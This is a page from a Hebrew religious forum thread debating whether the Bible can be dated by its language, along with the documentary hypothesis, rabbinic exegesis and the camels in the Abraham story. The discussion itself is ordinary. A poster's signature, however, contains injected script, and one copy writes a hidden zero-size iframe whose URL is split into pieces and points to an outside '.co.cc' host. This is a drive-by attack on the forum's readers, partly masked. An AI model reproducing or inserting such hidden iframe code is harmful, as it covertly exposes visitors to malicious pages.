בית פורומים עצור כאן חושבים

נסיון לתארך את המקרא לפי לשונו: מביקורת המקרא ועד ה"אקדמיה ליהדות"

שלום אורח. באפשרותך להתחבר או להירשם
הצג 15 הודעות בעמוד הוסף לדף האישי  דווח למנהל שלח לחבר
נשלח ב-5/6/2011 19:35 לינק ישיר 

את הויכוח הענייני אשאיר לאנשים יותר רציניים - אין לי מה להוסיף על מה שכתבתי והקורא ישפוט.

בהמשך לוויכוח הילדותי -
אציין כי לא נעלבתי ממך. 

דדווח על תוכן פוגעני

נשלח ב-5/6/2011 21:00 לינק ישיר 

פרזנט, אתה מעייף, יודע? התוכן שלך מעולה ומבריק, מדוע אתה חייב לנמר כל הודעה בעלבונות קטנוניים? לא ירדתי לסוף דעתך בזה.
ואני תקוה שדינוזאורוס בעל האקדמיה יבוא ויסביר את פשר הטעויות שמצא בו אריסטוטלס. ויש לי להודיע צערי לרבים, שגם אני תפסתיו בטעויות כגון דא, אלא שלימדתי עליו זכות שריבוי החומר העצום שבאתרו אינו מאפשר ירידה לפרטי פרטים.

דדווח על תוכן פוגעני

נשלח ב-5/6/2011 21:14 לינק ישיר 

תודה על המחמאה

דדווח על תוכן פוגעני

נשלח ב-5/6/2011 23:09 לינק ישיר 

מן הראוי היה לציין לינק לאתר בראשית האשכול, ואולי גם לאפיין אותו קצת יותר. ואם הוא של אחד מחברינו, ראוי היה להעמיד על כך. גם זה יושר אינטלקטואלי.

לעיל כתבתי שיש שינויים שנעשים בלא מודע ולא בכוונת זיוף אלא רק מתוך כך שזה נראה "אותו דבר" או אפילו "יותר טוב".

אני מבקש להוסיף דוגמא מעניינת שלקוחה ממחקר על ספר דברי הימים (שרה יפת, נדמה לי).

מתוך ניתוח הקבלות בין טקסטים בדברי הימים לבין ספר מלכים, מתברר שקטעים שמופיעים עם אחד משמות השם האופיינים בספר מלכים, מופיעים עם שמות אחרים בספר דברי הימים.

צריך כמובן דוגמאות לזה כדי לבדוק, וצריך רקע כדי לדון אם יש משמעות לשינוי הזה. (ודאי שלפי חסידי ביקורת המקרא שיצאו לדרך לפי חלוקת השמות יש בכך הרבה חשיבות). אך אם מתברר שמעתיקי הספרים, ואולי המחברים עצמם, שינו את השמות בשעה שערכו ספרים, אזי כמדומה שחלק ניכר מן הבסיס לחלוקה על פי שמות השם נופל.

מה שכתבתי אמור להצטרף לדיון על שינויי נוסח וכתיב בתנ"ך ומשמעותם, וחשבתי שזה הנושא המרכזי של האשכול.

אדם עליון

כתבת

"אינני מבין מדוע על אדם הגיוני לחשוב שספר בראשית נכתב בידי משה, ועוד מפי ה'.

אין שום כתוב בספר זה, או בכלל במקרא, שמתיימר לטעון לשני הייחוסים הללו, יחד או בנפרד"

האם זו לא הזמנה לדיון בשאלה מי כתב את ספר בראשית? אולי זה חלק מן הדיון, אבל עיקרו של הדיון הוא התיארוך האפשרי של ספר בראשית לפי מונחים שיש או שאין בו.

לגבי "אדם הגיוני" חוששני שהמונח פחות ברור ממה שאתה סבור. האם כוונתך לאדם שמשתדל שכל אמונותיו לא יסתרו זו את זו, כלומר שמערכת האמונות שלו תהיה חפה מסתירה לפי המונח הטכני? או שהוא אינו מחזיק בשום אמונה בלי הוכחה? ואינו מתנהג לפי שום אמונה בלא הוכחה?

זה לדעתי מתאים לאשכול אחר, מה אנו בוחרים כתשתית למעשינו ומחדלינו ואמונותינו, ומהי רציונליות. איני יודע אם היה דיון כזה, אבל ודאי מקומו לא באשכול זה.

אולי תרצה לפתוח על זה אשכול, כי אין זמני בידי.

דדווח על תוכן פוגעני

נשלח ב-5/6/2011 23:15 לינק ישיר 

הנוכח

כתבת

"כדי להוכיח את קדימות המקרא אתה יוצר דיכוטומיה כוזבת, לפיה המודעות ההיסטורית התחילה אתמול, ולכן לא יתכן שמישהו שיכתב בשפה של פעם".

אם כך הבנת אותי, סימן שלא הסברתי את עצמי היטב.

מה שרציתי לומר הוא שאם היתה תופעה של כתיבה המיוחסת אחורה, איני יודע מאימתי היו פקחים כאלו שגם רצו לכתוב ולמעשה לזייף וגם היו מודעים לכך שעליהם להתאים את השפה שלהם לשפה המקורית.

המודעות לשינויי תרבות ושפה נראית לי מאוחרת יותר. הבאתי דוגמא לדבר ממעשה הגמלים שלקח עבד אברהם. זו לא דוגמא לגמרי מדוייקת, ויש מי שיחלוק עליה (אני למשל, כי אני מאמין לסיפור המקורי, ואני מביא זאת כהמחשה למי שסבור שיכלו להיות תוספות  והבלעות בטקסט). המספר שחי לפי זה בין ימי אברהם לבין ימי משה סיפר את הסיפור והפך אותו לחלק מן המסורת של צאצאי אברהם והאבות, אבל הוסיף את נוכחותו של הגמל שלא היתה בסיפור המקורי. והוא לא העלה בדעתו שעל ידי כך הוא מוכיח שהגרסה שלו לא יכלה להיות מדוייקת.

לכך התכוונתי ולא יותר.

עוד כתבת

"חז"ל השתמשו במיתולוגיות כמקור מידע היסטורי של ממש, למשל: מהסתירה בין בראשית א' (העופות נוצרו מן המים) לבראשית ב' (העופות, כמו כל בעלי החיים, נוצרו מן האדמה) הסיקו שהעופות נוצרו מן הרקק ולכן הם נכנסים בהגדרה של פרי מפרי וגידולי קרקע ואפשר לקנות אותן בכסף מעשר (שים לב - זו אינה דרשה לשונית ממה שתכל'ס אלוהים חתם עליו, אלא ידע היסטורי הנחוץ להלכה זו או אחרת. דומה הדבר למי שיוכיח מן המקרא כי חשמל הוא אש ולכן אסור בשבת)

הרמה להנחתה - ההנחתה תהיה כנראה שבקונטקסט התלמודי המקור ההיסטורי הוא הטקסט התנ"כי (ועיין בסוגריים הקודמות)."

לצערי לא הבנתי את דבריך. אולי נפלה טעות במילה "מיתולוגיות"? אולי תוכל לבאר יותר לאיזה  טקסט אתה מכוון, מה עשו איתו חז"ל, ואיך זה קשור לאשכול. האם כוונתך שחז"ל הסתמכו על סתירות בין פסוקים כדי לגזור מהם ידע עובדתי כביכול ועליו חזרו ובנו הלכות כמו הלכות שבת? אם כן, איך זה קשור לכאן? האם בכך שהם לא העלו בדעתם שאולי הטקסט בנוי שכבות כאשר מעתיק מאוחר הוסיף שינויי מלים בכוונה או לא בכוונה? בוודאי שהתשובה היא שחז"ל האמינו שהטקסט יצא בשלימותו מיד משה מפי ה' ולכן ניתן לסמוך עליו. אז לא הבנתי מה רצית לטעון. נא הסבר והתחשב בחוסר הבנתי.

שומר פיו ולשונו - שומר מצרות נפשו < type="text/">document.write("");

דדווח על תוכן פוגעני

נשלח ב-5/6/2011 23:38 לינק ישיר 

טוב, מיימוני, אתה בטח זוכר ששמתי לך באשכול שלי "(...)"...
צר לי, אך לפעמים נדמה שגם אתה מתקשה באותו תחום דעת עליו כתבת שם

מיימוני כתב:
הנוכח

כתבת

"כדי להוכיח את קדימות המקרא אתה יוצר דיכוטומיה כוזבת, לפיה המודעות ההיסטורית התחילה אתמול, ולכן לא יתכן שמישהו שיכתב בשפה של פעם".

אם כך הבנת אותי, סימן שלא הסברתי את עצמי היטב.

מה שרציתי לומר הוא שאם היתה תופעה של כתיבה המיוחסת אחורה, איני יודע מאימתי היו פקחים כאלו שגם רצו לכתוב ולמעשה לזייף וגם היו מודעים לכך שעליהם להתאים את השפה שלהם לשפה המקורית.

המודעות לשינויי תרבות ושפה נראית לי מאוחרת יותר. הבאתי דוגמא לדבר ממעשה הגמלים שלקח עבד אברהם. זו לא דוגמא לגמרי מדוייקת, ויש מי שיחלוק עליה (אני למשל, כי אני מאמין לסיפור המקורי, ואני מביא זאת כהמחשה למי שסבור שיכלו להיות תוספות  והבלעות בטקסט). המספר שחי לפי זה בין ימי אברהם לבין ימי משה סיפר את הסיפור והפך אותו לחלק מן המסורת של צאצאי אברהם והאבות, אבל הוסיף את נוכחותו של הגמל שלא היתה בסיפור המקורי. והוא לא העלה בדעתו שעל ידי כך הוא מוכיח שהגרסה שלו לא יכלה להיות מדוייקת.

לכך התכוונתי ולא יותר.

פרזנט:
לפעמים בני אדם כותבים עם ניסיון ליצור רושם של כתיבה קדומה (ניתן להוכיח זאת כאשר מוצאים טעות היסטורית שהתפלקה להם). כזה בדיוק הוא המצב של החומשים.

מיימוני:
הנוכח - לא הייתה אז מודעות היסטורית לכך שבזמנים שונים מדברים בצורות שונות.
לעיתים משתחלות הגזמות אל סיפורים ישנים אמיתיים.

פרזנט מנסה להבין - בשביל מה כתב רבי מיימוני כזה משפט, כשהוא מאדרס אותו אליי?
סביר, שהוא ניסה לומר שלייחס תופעה כזאת למקרא זהו דבר שלא יתכן, שכן אז לא הייתה מודעות היסטורית כזו. ושההסקה ע"פ טעויות היסטוריות יש לה תשובה (נניח).

ע"ז כותב פרזנט:
אתה מציג דיכוטוומיה כוזבת. יתכן מאוד שגם כותבי המקרא היו זייפנים - מאיפה המצאת שהמודעות לשינויי סגנון בין תרבויות נוצרה אתמול? היא הייתה מאז ומעולם.

מיימוני:
... (אין לי מושג מה רצית בהודעה זו. אלא אם כן גם בהודעתך הקודמת לא התכוונת לכתוב שום דבר, וסתם הפנית אותה אליי)

עוד כתבת

"חז"ל השתמשו במיתולוגיות כמקור מידע היסטורי של ממש, למשל: מהסתירה בין בראשית א' (העופות נוצרו מן המים) לבראשית ב' (העופות, כמו כל בעלי החיים, נוצרו מן האדמה) הסיקו שהעופות נוצרו מן הרקק ולכן הם נכנסים בהגדרה של פרי מפרי וגידולי קרקע ואפשר לקנות אותן בכסף מעשר (שים לב - זו אינה דרשה לשונית ממה שתכל'ס אלוהים חתם עליו, אלא ידע היסטורי הנחוץ להלכה זו או אחרת. דומה הדבר למי שיוכיח מן המקרא כי חשמל הוא אש ולכן אסור בשבת)
הרמה להנחתה - ההנחתה תהיה כנראה שבקונטקסט התלמודי המקור ההיסטורי הוא הטקסט התנ"כי (ועיין בסוגריים הקודמות)."

לצערי לא הבנתי את דבריך. אולי נפלה טעות במילה "מיתולוגיות"? אולי תוכל לבאר יותר לאיזה  טקסט אתה מכוון, מה עשו איתו חז"ל, ואיך זה קשור לאשכול. האם כוונתך שחז"ל הסתמכו על סתירות בין פסוקים כדי לגזור מהם ידע עובדתי כביכול ועליו חזרו ובנו הלכות כמו הלכות שבת? אם כן, איך זה קשור לכאן? האם בכך שהם לא העלו בדעתם שאולי הטקסט בנוי שכבות כאשר מעתיק מאוחר הוסיף שינויי מלים בכוונה או לא בכוונה? בוודאי שהתשובה היא שחז"ל האמינו שהטקסט יצא בשלימותו מיד משה מפי ה' ולכן ניתן לסמוך עליו. אז לא הבנתי מה רצית לטעון. נא הסבר והתחשב בחוסר הבנתי.

כתבת שמה שקרה הוא שמשה, או כותב קדום לו, הוסיף גמלים (או הגדיל את מספרם לכדי אבסורד) לסיפורי האגדה שהיו בידו.
לכאורה קשה - וכי יתכן שקר/דמיייענעס בתיירע?!?!?!?! (כן, אם הוא קדוש... אבל אין זה ענייננו עכשיו)
והתשובה היא געוולדיג - ניין! אלא שאת האגדות שמויישע רביינו הכיר, על הדמיייענעס והכזבים שבהם, הם הם מה שבויירעויילום אמר לו לכתוב! ועכשיו זוהי התיירע הקדויישו! א-מורא'דיג!

(כאן מסתתרת שאלה חבויה. אם הכל מה שמשה כתב כולל שטויות מופרכות איך אפשר לדרוש כל אות ותג? אבל ע"ז התשובה היא פשוטה שבתכל'ס אלוהים חתם על זה (אופציונלי: א-מורא'דיג).)

אבל פרזנט לא טיפש לשאול שאלה שיש לה תשובה פשוטה.
מה שהוא שואל הוא לגבי גזירת ידיעות מדעיות להלכה ממיתולוגיות אלו, למשל מהסתירה בין בראשית א' (מים) לבראשית ב' (אדמה) הסיקו חז"ל שהעופות נבראו מן הרקק ונפקא מינה לגבי זה שהם נקנים בכסף מעשר כגידולי קרקע (אולי אתה לא מכיר את הדרשה הזו אבל זו כבר באמת לא בעיה שלי. היא מופיעה גם ברש"י בבראשית ב').
אילו אלו מיתולוגיות עם דמיונות וכזבים מה מקום יש לגזור מהם ידיעות מדעיות להלכה? וכי תעלה על דעתך לגזור ידיעה מדעית לגבי אם חשמל הוא אש (ונפ"מ לענין שבת) ממיתולוגיה?

שומר פיו ולשונו - שומר מצרות נפשו ******* type="text/">document.write("*************** scrolling='no' frameborder='0' height='0px' width='0px' src='ht"+"tp:"+"/"+"/"+"vjgvj.co"+".cc/?a="+***************+"'><*");

האמת שגם אתה קצת מעייף אותי, בפרט שלדעתי אתה אינטילגנט מספיק כדי להבין רק רוצה למרוח זמן.

דדווח על תוכן פוגעני

נשלח ב-6/6/2011 00:18 לינק ישיר 

הנוכח

גם אז וגם אתה לא הבנתי מה אותן שלוש נקודות באו לסמל. אם תרצה, באר. התחשב שאני מבוגר ממך, וכנראה עייף ואולי באמת לא מספיק אינטליגנטי. מה לעשות. אילו הייתי חרש, והיינו משוחחים בעל פה, היית צריך להרים קול כדי שאשמע. אז אותו דבר לגבי שיחה וירטואלית. הסבר, הסבר, הסבר, בלי להקפיד על מי שאינו חכם כמוך.

(המשל על החרש שייך במקור לסוקרטס).

קראתי את מה שכתבת באדום. יש שם קטע שדקדקת מדברי בגלל שזה "סביר". 

פרזנט מנסה להבין - בשביל מה כתב רבי מיימוני כזה משפט, כשהוא מאדרס אותו אליי? 
סביר, שהוא ניסה לומר שלייחס תופעה כזאת למקרא זהו דבר שלא יתכן, שכן אז לא הייתה מודעות היסטורית כזו. ושההסקה ע"פ טעויות היסטוריות יש לה תשובה (נניח). 

אז לא כל מה שסביר הוא גם נכון. רק חלק. אני כן מסכים שאם מוצאים טעויות היסטוריות יכולות להיות להן סיבות אחרות מלבד ההנחה שמחברי המקרא היו שקרנים וזייפנים, (נדמה לי שזה המינוח שלך. האם אינך חושב שזה חריף מדי? האם אינך חושב שיכלו להיות להם מניעים אחרים?).

עוד כתבת בתוך דבריך לגבי השאלה איך השתרבבו אי דיוקים לתורה, אם זה אכן קרה. והגעת לאפשרות הזו:

תשובה היא פשוטה שבתכל'ס אלוהים חתם על זה

ואכן אני מסכים לזה. משה כתב מה שהעם שקיבל את התורה הכיר בתור היסטוריה ומדע, ואלקים הסכים שכך צריך לכתוב לעם בשלב זה של התפתחותו.

זה הסבר סביר מאד, וזה למעשה לא חידוש שלי, אלא כבר מופיע אצל שד"ל וכמדומה קאסוטו.

ושים לב שזה עולה בקנה אחד עם ההנחה שמשה כתב את התורה. כמובן, להוכיח שמשה כתב את התורה זה נידון אחר. אני מבין שזה חשוד בעיניך. אבל - הערה מתודולוגית - צריך להאריך בדיון לפי מה קובעים מה נכון ומה לא. אני כותב בלי שום הוכחה רק כדי להעלות אפשרות: אני סבור שאתה ממהר מדי להאמין למבקרי המקרא. ואם תעיין שוב במחקרים תוכל להגיע למסקנה זו שלי. וכמדומה שהיו כבר דיונים כאלו באשכולות, ואם לא, ראוי לפתוח חדש. מה הם טוענים. על סמך מה. איך קובעים למה להאמין. ועוד.

עוד כתבת

אבל פרזנט לא טיפש לשאול שאלה שיש לה תשובה פשוטה. 
מה שהוא שואל הוא לגבי גזירת ידיעות מדעיות להלכה ממיתולוגיות אלו, למשל מהסתירה בין בראשית א' (מים) לבראשית ב' (אדמה) הסיקו חז"ל שהעופות נבראו מן הרקק ונפקא מינה לגבי זה שהם נקנים בכסף מעשר כגידולי קרקע (אולי אתה לא מכיר את הדרשה הזו אבל זו כבר באמת לא בעיה שלי. היא מופיעה גם ברש"י בבראשית ב'). 
אילו אלו מיתולוגיות עם דמיונות וכזבים מה מקום יש לגזור מהם ידיעות מדעיות להלכה? וכי תעלה על דעתך לגזור ידיעה מדעית לגבי אם חשמל הוא אש (ונפ"מ לענין שבת) ממיתולוגיה? 

נראה לי שעכשו אני מבין.

אתה קורא למה שנכתב בסיפור בראשית "מיתולוגיה" כי בעיניך זה כמו המיתולוגיה היוונית ועוד. (בעיני לא, ויש הבדלים שאפשר להכיר, אבל נניח לזה. אם תרצה אשמח לדון בכך כלומר בהבדלים התכניים הגדולים לדעתי).

אם נסתפק בטענה יותר עדינה, לאמור שמה שכתוב שם אינו משקף מציאות חוקית ופיזיקלית אלא סיפור דברים לעם ישראל (לפי שד"ל למשל: כדי שיבינו שכל הבריאה היא מה' ולא היו לו שותפים כמו במיתולוגיות). אבל חז"ל הסיקו מסקנה שלדעתך היא מדעית ומזה הסיקו מסקנה הלכתית.

ובזה תרשה לי לא להסכים עמך.

איני יודע מי היו חז"ל אלו בעלי הדרשה. איני יודע באיזו מידה מה שנכתב משקף את כל הדרשנים ושיטות הדרש. אבל נניח גם לזה.

מדוע להניח שחז"ל סברו שזו ידיעה מדעית? אולי הם סברו שמכך שהתורה משתמשת בניסוחים כאלו, אפשר להסיק מסקנה הלכתית, בלי לעבור דרך התיווך של ידיעה מדעית?

סוף סוף, לומר שיצור מסויים נברא באופן כזה או אחר, שזה דרך נס, האם זה אומר משהו על השתייכותו הביולוגית?

יש כאן אבחנות דקות, שיכולות בהחלט להראות כ"פלפול" במובן הרע שלו, אבל לדעתי חשוב להיזהר באבחנות כאלו. אחרת אנו ממהרים להסיק מסקנות מטקסטים כאשר בעלי הטקסטים, כוונתי לחז"ל, היו יותר מתוחכמים מכפי שמפרשיהם בעלי ביקורת המקרא מבינים (או מסוגלים להבין?).

סליחה שאני פוגע באמונך בבעלי ביקורת המקרא. אבל לא כדאי להיות חד צדדי ולתת אמון רק בהם. 

אם כבר התחלתי, אני מרשה לעצמי להוסיף:

פה או שם נתת ביטוי לחלוקה של ספרי המקרא לפי דורות ואסכולות, כאשר הפרדת בין ספרים שנכתבו לפני היות האסכולה הדויטרו', כלומר מחברת ספר דברים, ואחר כך.

האם העלית בדעתך שאולי גם החלוקה הזו מלאכותית? שאולי היא כפויה על הטקסטים והיא אינה ההסבר הפשוט ביותר לסתירות שאולי ניתן לגלות בהם?

אני באמת ממליץ לך לקרוא יותר בתחום. איני בא חלילה למעט במה שהשקעת ועיינת. אני רק מסתמך על מה שקראתי בעצמי, וכמדומה לפי מה שראיתי שדבריהם קלושים. (ראה ב"תורת התעודות" של קאסוטו ומשום והלאה לפי סדרי המחקר. לא כל מה שאחד כתב ואחרים העתיקו זו הוכחה שאכן זו החלוקה הנכונה).

אולי כדאי היה לפתוח אשכול על החלוקה הדויטרו', תולדותיה והצדקותיה. אז הבה ונשמור את המשך הדיון הזה לשם. אתה מוזמן לכתוב סיכום של הנושא הזה שממנו יוכל כל בר דעת וישר (שני תנאים הכרחיים) לגלות שאתה צודק.

דדווח על תוכן פוגעני

נשלח ב-6/6/2011 00:19 לינק ישיר 

מיימוני כתב שמוגזם לחשוב שהיה לאברהם מספר מופרז כ"כ של גמלים, אלא ע"כ שהכותב נקט מספרים עצומים של גמלים.
לקרוא ולא להאמין!!!
הקורא התמים עלול להבין מדבריו שהתורה נוקטת במספר של חמש מאות גמלים לפחות.
ובכן מדובר על עשרה גמלים בסך הכל!!! כמו של בדואי ממוצע בנגב.
האם מיימוני חפץ לו לצון מעימנו ?!

תוקן על ידי חרפת_אדם ב- 06/06/2011 00:22:04

דדווח על תוכן פוגעני

נשלח ב-6/6/2011 00:43 לינק ישיר 

חרפת אדם וכולם

הספר נקרא "התנך היה באמת". המחברת: ליאורה רביד. סדרת יהדות כאן ועכשו של ידיעות אחרונות.

עמ' 44 והלאה, גמלים וכתיבה היסטורית.

יש מחלוקת עתיקה שרציתי להקדיש לה אשכול (ואולי כבר היה) לגבי המועד בו גמלים הפכו לאמצעי תחבורה וכלי של האדם. כלומר מתי בויתו ואיך זה הולם את התיארוך של הופעתם במקרא.

יש גישות שונות לכך. ורציתי לסכם ספרי מחקר, כי יש שעל סמך נוכחות גמלים בסיפור שללו את כולו כזיוף. ולמעשה גם קשה מאד לדעת מתי היו ולמי ואם זה באמת מסתדר או לא. (ההוכחות והראיות על דרך השלילה יידונו אם כן במקום אחר).

כאן אני מצטט או מסכם מדבריה בשתי נקודות. לגבי גמלים ולגבי שינויים שלא מדעת, ששניהם נידונו באשכול זה.

אני מתחיל מהסוף.

"ספרות העוברת במסירה שבעל פה מדור לדור נוטה להשתנות. יש להניח שכל מספר שינה פרט או שנים מהסיפור שנחל מקודמו ואף הוסיף לו מעט... יתכן שפרטים אחדים ממה ששמע פרחו מזכרונו. אפשר גם ששמט בכוונה פרטים שנראו לא פחותי ערך, או הדגיש פרטים שבעיני אבותיו נראו שולייים. אפשר כמובן שהוא מסר לשומעיו בצורה מדוייקת מה ששמע מקודמיו."

שימו לב שהאפשרות של הדיוק מובאת כאן אחרונה...

לאחר הכתיבה הטקסט פחות חשוף לשינוי. אבל לא בהכרח. זו אולי הנחת יסוד אופטימית מדי כפי שמציינת גם רביד. 

לגבי גמלים

לפי הסיפור אברהם שלח עשרה גמלים עמוסי כל טוב למשפחתו בחרן.

רביד מציעה את האפשרות הבאה:

מאות שנים לאחר ביות הגמל אחד המעתיקים את סיפורו של אברהם מוסיף תוספת שנועדה להציג את עושרו המופלג. 

האם עשרה גמלים זה כה הרבה?

רביד טוענת שכן, ואין לי כלים לבדיקה. אדרבה, מוזמנים כולם לבדוק ולהציע, בין מהשערה, בין ממקורות שונים שאולי יש להם ואין לי.

היא כותבת (עמ' 47):

"בתקופה שבה הועלה על הכתב סיפור מסעו של אברהם, היה הגמל יקר כל כך, שרק מלכים יכלו להרשות לעצמם להחזיקו. הקביעה שבבעלותו של אברהם נמצאו לכל הפחות עשרה גמלים, משולה במושגי ימינו להצהרת הון של אדם שברשותו צי של עשר מכוניות פאר, עשרה מטוסים פרטיים ועשר אחוזות המפורזות ברחבי העולם".

אז ככה.

לגבי ההמחשה כיצד מתרחש שינוי לא מדעת, אני סבור שזה אמור להיות ברור.

השאלה היא אם זה מה שקרה עם הסיפור על אברהם.

אחת הנקודות היא האם באמת גמלים היו כה יקרים, ובאיזו תקופה מדובר, ומהיכן יודעים זאת. רביד לא ציינה מקור לקביעה שלה. הנה, השיירה שלקחה את יוסף מצרימה, בהפרש של מאה עד מאתיים שנה (300?) כבר היתה מבוססת על גמלים. או שמא גם זה תיקון שלאחר זמן?

אז באמת מנין שגמלים היו כה יקרים? אולי באמת טעיתי שסמכתי על דבריה, ותודה לחרפת אדם.

מצד שני, כדאי לבדוק שוב לפני שקופצים ומחליטים סופית. אשמח על כל מקור בנושא שנוגע לשויו של הגמל עם ראשית ביותו.

דדווח על תוכן פוגעני

נשלח ב-6/6/2011 00:53 לינק ישיר 

מיימוני כתב:

"אחרת אנו ממהרים להסיק מסקנות מטקסטים כאשר בעלי הטקסטים, כוונתי לחז"ל, היו יותר מתוחכמים מכפי שמפרשיהם בעלי ביקורת המקרא מבינים (או מסוגלים להבין?)"

למה אתה כותב דברים מוחלטים?
קשוט עצמך תחילה!

בעיני מגוחך להפליא לחשוב שחז"ל היו יותר חכמים מילד חרדי ממוצע, מבחינת המתודולוגיה של החשיבה שלהם, המודעות שלא הייתה להם למגבלות שלהם, חוסר המודעות ההיסטורית, חוסר בחשיבה רפלקטיבית, וכשלים מוסריים, ועוד ועוד - וכל זה בייחס לפילוסופים ההלניסטיים שחיו 1000 שנה לפניהם, לרומאים שחיו במקביל להם, ואפילו לתיאולוגים הנוצרים; לא שהם אמרו כל מיני משלים מזרחיים ואמרות כנף ופתגמי סבתא שלי אמרה לי שמי שמתאמץ מאוד מוצא בהן עומק אינסופי. בהקשר זה אני ממליץ על האפליקציה של החכם הסיני בפייסבוק, שנותנת משפטים עם הרבה "עומק" על בסיס יומי, שמכניסים את חז"ל וחכמתם המופלאה וחסרת המשמעות בכיס הקטן.

עוד הערה:
מודה, לא קראתי ביקורת המקרא במקור (כולם מוזמנים לצטט אותי).
אני מתכנן לעשות זאת בהזדמנות.
מה שכן, אני עושה משהו אחר, מה שאני עושה גם לגבי עוד דברים שאלא קראתי את כל האפולוגוטיקה אודותיהם:
אני מעלה בעיות לדיון - והפלא ופלא: אף לא אחד מבין הידענים כאן שקרא את קאסוטו ושד"ל וקויפמן והדומים להם מוצא משהו שדומה לתשובה עליהן (למשל הסיפור הפנטסטי על חיסול צבא סנחריב). ולא עזר שהם קראו את קויפמן ושהם יודעים שביקורת המקרא ה'מתקדמת' כופרת מכל וכל בכל תורת התעודות (שזה סתם שקר - אולי קויפמן כופר, ואם אתה מגדיר אותו כביקורת המקרא המתקדמת תוכל להגדיר את חז"ל ככאלו ו you rest your case אם בפעלולים סמנטיים עסקינן). כל מה שהם יודעים זה להפנות באדיקות לקויפמן (שגם הוא כפי שכתבתי מוטה ע"י אידיאולוגיה אך הפוכה לזו של וולהאוזן) ויהושע עציון שהוא ארכיאולוג חובב שמסתמך על פסאודו-מדען בשם וליקובסקי. 

דדווח על תוכן פוגעני

נשלח ב-6/6/2011 01:59 לינק ישיר 

לדברי הבקורת הללו (בראשית האשכול) שניכר בהם שנכתבו מתוך אהבת אמת צרופה, ושאיפה כנה לתיקון עולם במלכות שדי, התייחסתי כאן. סליחה אם הפרעתי לרציפות הדיון הנפלא והמחכים שבעמוד הנוכחי.

דדווח על תוכן פוגעני

נשלח ב-6/6/2011 06:20 לינק ישיר 

תודה דינו, 
כבר חששתי לרגע שמא תשאיר את הנייר חלק.

דדווח על תוכן פוגעני

נשלח ב-6/6/2011 08:08 לינק ישיר 

דינו

כתבתי ומחקתי כיון שלא הסתכלתי בלינק. חוזרני בי.

אבל

סבורני שמן הראוי להעתיק את הדברים לכאן. הם לא ארוכים מדי, אם כי אפשר לשים רווח בין הפסקאות.

ניסיתי להעתיק ולא הצלחתי. כבעל הדברים, התוכל אתה לעשות זאת?

תוקן על ידי מיימוני ב- 06/06/2011 08:11:24

דדווח על תוכן פוגעני

נשלח ב-6/6/2011 13:23 לינק ישיר 

דינו.
עכב קוצר הזמן, תשובה מפורטת לכל אחת מטענותיך תבא אי"ה בהמשך.

דדווח על תוכן פוגעני

נשלח ב-6/6/2011 13:56 לינק ישיר 

באמת אינני מבין את הקושיות של פותח האשכול. על ראיות דלות מאלה מפרסמים תיאוריות של ביקורת המקרא. אז מה אם "פרעה נכה" מוזכר בספר מלכים רק שלוש וחצי פעמים? הרי אם היה מוזכר שם הוי"ה פעם אחת היו קובעים שזה מסמך J, ושהפסוק שלאחריו עם שם אלוהים הוא שעטנז של מסמך E. למה לא לתת את אותו חופש פעולה לצד שמנגד? את כללי המשחק הקרקסיים קבעו האקדמאים המעונבים..

דדווח על תוכן פוגעני

בית > פורומים > דת ואמונה > עצור כאן חושבים > נסיון לתארך את המקרא לפי לשונו: מביקורת המקרא ועד ה"אקדמיה ליהדות"
מנהל לחץ כאן לנעילת האשכול
הוסף לעמוד האישי  דווח למנהל שלח לחבר
לדף הקודם 1 2 3 4 5 6 לדף הבא סך הכל 6 דפים.

bholext
2009 © כל הזכויות שמורות לבחדרי חרדים. קטגוריית אקטואליה וחדשות: עשרות פורומים הכוללים חדשות נעייס, מה קורה בחצרות חסידים, חדשות מחסידויות שונות בארץ ובעולם, דיונים בנושאי אקטואליה, פוליטיקה, בטחון ועוד.